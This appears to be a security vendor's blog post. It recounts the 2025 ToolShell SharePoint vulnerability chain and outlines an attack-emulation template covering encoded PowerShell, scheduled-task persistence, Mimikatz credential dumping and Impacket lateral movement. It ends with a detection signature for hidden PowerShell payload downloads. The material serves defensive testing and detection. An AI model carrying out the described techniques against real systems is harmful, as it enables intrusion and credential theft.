On July 8, 2025, vulnerabilities CVE-2025-49704 (Remote Code Execution) and CVE-2025-49706 (Network Spoofing), affecting on-premises Microsoft SharePoint servers, were officially reported. On the same day, Microsoft addressed both vulnerabilities as part of its July 2025 Patch Tuesday release.

Initially disclosed by Viettel Cyber Security during Pwn2Own Berlin 2025, a computer hacking contest where researchers are challenged to exploit widely used software, these vulnerabilities were employed as part of a chained attack, publicly known as “ToolShell”, which enables unauthenticated access and arbitrary command execution on vulnerable SharePoint instances.

On July 18, Eye Security reported the large-scale exploitation of the ToolShell chain in the wild. According to the report, the initial wave occurred on July 17, presumably as part of a testing activity. By the following day, the first successful exploitation activity was identified with the objective of compromising on-premises SharePoint environments worldwide.

On July 19, two additional vulnerabilities were discovered: CVE-2025-53770, which exploits unsafe deserialization to achieve Remote Code Execution (RCE), and CVE-2025-53771, a spoofing/path traversal vulnerability that enables unauthenticated access. Notably, CVE-2025-53770 serves as a patch bypass for CVE-2025-49704, while CVE-2025-53771 bypasses CVE-2025-49706. These represent evolved variants of the original ToolShell vulnerabilities, indicating that initial vendor-provided remediation was incomplete.

On July 20, the Cybersecurity and Infrastructure Security Agency (CISA) issued an alert detailing the active exploitation of the ToolShell chain. The alert noted that in addition to typical webshell payloads such as .aspx and .exe, adversaries had also been observed deploying .dll payloads.

On July 22, Microsoft confirmed that two China-based adversaries, Linen Typhoon and Violet Typhoon, had exploited these vulnerabilities to target internet-facing SharePoint servers. More recently, Microsoft identified that a third Chinese adversary, Storm-2603, leveraged the same vulnerability chain to deploy Warlock ransomware, resulting in file encryption on compromised systems.

AttackIQ has released a new assessment template that compiles the Tactics, Techniques, and Procedures (TTPs) associated with the exploitation of the CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, and CVE-2025-53771 vulnerabilities, which affect on-premises Microsoft SharePoint servers to help customers validate their security controls and their ability to defend against this critical threat.

Validating security program performance against these behaviors is vital in reducing risk. By employing this assessment template within the AttackIQ Security Optimization Platform, security teams will be able to:

• Evaluate security control performance against the Tactics, Techniques and Procedures (TTPs) associated with the exploitation of these critical SharePoint vulnerabilities.
• Assess overall security posture against a recent and actively exploited vulnerability chain targeting SharePoint instances.
• Continuously validate detection and prevention pipelines against a worldwide range of adversaries leveraging these critical vulnerabilities.

This emulation compiles the Tactics, Techniques, and Procedures (TTPs) associated with the exploitation of the CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, and CVE-2025-53771 vulnerabilities, which affect on-premises Microsoft SharePoint servers.

It is based on reports published by Eye Security on July 19, 2025, CISA on July 20, 2025, Trend Micro on July 22, 2025, and Microsoft on July 22, 2025.

1. Initial Access: Consists of scenarios designed to imitate the communication associated with the reconnaissance and exploitation of the SharePoint vulnerabilities by validating a Web Application Firewalls (WAFs).

2. Execution: Consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, such as exploring a network or stealing data.

Command and Scripting Interpreter: PowerShell (T1059.001): This scenario encodes a user-defined PowerShell script into base64 and then executes it using PowerShell's -encodedCommand parameter.

3. Persistence: Consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access.

Scheduled Task/Job: Scheduled Task (T1053.005): This scenario acquires persistence through the creation of a new scheduled task using the schtasks utility.

4. Credential Access: Consists of techniques used by adversaries to harvest credentials available on the compromised system.

OS Credential Dumping (T1003): This scenario uses an obfuscated version of Mimikatz to dump passwords and hashes available on the compromised environment.

5. Discovery: Consists of techniques that adversaries use to discover information related to the compromised environment.

System Owner/User Discovery (T1033): This scenario executes the whoami command to retrieve the username of the running user account.

6. Lateral Movement: Consists of techniques that adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring the network to find their target and subsequently gaining access to it.

Windows Management Instrumentation (T1047): This scenario emulates the use of the Impacket utility to execute the WMIEXEC class, facilitating lateral movement via the WMI protocol.

7. Associated Payloads: Consists of malicious components observed in conjunction with the exploitation of the SharePoint vulnerabilities.

Ingress Tool Transfer (T1105): This scenario downloads to memory and saves to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious payloads.

Opportunities to Expand Emulation Capabilities

In addition to the released emulation, AttackIQ recommends the following scenario to extend the emulation of the capabilities associated to the exploitation of these vulnerabilities:

Lateral Movement Through PAExec: This scenario simulates lateral movement within a network using PAExec, an open-source version of PsExec.

Detection and Mitigation Opportunities

Given the breadth of TTPs associated with the exploitation of these vulnerabilities, determining which to prioritize for prevention and detection assessment can be challenging. AttackIQ recommends initially focusing on the following techniques before expanding coverage to the remaining techniques.

1. Review CISA’s Patching and Detection Recommendations:

CISA has provided a significant number of recommendations for the best ways to defend yourself from these and similar attacks. AttackIQ strongly recommends reviewing the detection and mitigation recommendations with the goal of adapting them to your environment first to determine if you have any existing impact before reviewing the assessment results.

This actor relies heavily in downloading additional stages of malware. Endpoint and Network security controls should both be employed to try and detect the delivery of these malicious payloads.

2a. Detection

The following signatures can help identify when native utilities are being used to download malicious payloads.

PowerShell Example:

Process Name == (Cmd.exe OR Powershell.exe)Command Line CONTAINS ((“IWR” OR “Invoke-WebRequest") AND “DownloadData” AND “Hidden”)

2b. Mitigation

MITRE ATT&CK has the following mitigation recommendations.

• M1031 – Network Intrusion Prevention

Wrap-up

In summary, this emulation will evaluate security and incident response processes and support the improvement of your security control posture against this critical threat. With data generated from continuous testing and use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a well-known and dangerous threat.

AttackIQ, the leading provider of Adversarial Exposure Validation (AEV) solutions, is trusted by top organizations worldwide to validate security controls in real time. By emulating real-world adversary behavior, AttackIQ closes the gap between knowing about a vulnerability and understanding its true risk. AttackIQ’s AEV platform aligns with the Continuous Threat Exposure Management (CTEM) framework, enabling a structured, risk-based approach to ongoing security assessment and improvement. The company is committed to supporting its MSSP partners with a Flexible Preactive Partner Program that provides turn-key solutions, empowering them to elevate client security. AttackIQ is passionate about giving back to the cybersecurity community through its free award-winning AttackIQ Academy and founding research partnership with MITRE Center for Threat-Informed Defense.